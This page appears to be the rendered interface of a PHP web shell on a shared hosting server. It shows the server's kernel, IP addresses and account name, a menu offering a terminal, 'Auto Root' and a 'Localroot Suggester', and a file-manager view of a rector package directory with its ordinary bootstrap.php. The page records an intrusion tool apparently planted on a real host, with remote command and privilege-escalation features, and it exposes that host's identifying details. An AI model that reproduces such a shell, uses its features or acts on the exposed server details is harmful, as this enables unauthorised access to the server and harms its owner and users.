Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
Server IP : 162.0.217.164 & Your IP : 216.73.216.24
Domains :
Cant Read [ /etc/named.conf ]
User : niyknzcu
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-wappspector /
vendor /
rector /
rector /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
config
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
rules
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
src
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
stubs-rector
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
templates
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
vendor
[ DIR ]
drwxr-xr-x
2024-11-08 13:59
LICENSE
1.1
KB
-rw-r--r--
2024-11-08 13:59
README.md
6.11
KB
-rw-r--r--
2024-11-08 13:59
bootstrap.php
800
B
-rw-r--r--
2024-11-08 13:59
composer.json
754
B
-rw-r--r--
2024-11-08 13:59
preload.php
30.31
KB
-rw-r--r--
2024-11-08 13:59
Save
Rename
<?php declare(strict_types = 1); // inspired by https://github.com/phpstan/phpstan/blob/master/bootstrap.php spl_autoload_register(function (string $class): void { static $composerAutoloader; // already loaded in bin/rector.php if (defined('__RECTOR_RUNNING__')) { return; } // load prefixed or native class, e.g. for running tests if (strpos($class, 'RectorPrefix') === 0 || strpos($class, 'Rector\\') === 0) { if ($composerAutoloader === null) { // prefixed version autoload $composerAutoloader = require __DIR__ . '/vendor/autoload.php'; } // some weird collision with PHPStan custom rule tests if (! is_int($composerAutoloader)) { $composerAutoloader->loadClass($class); } } });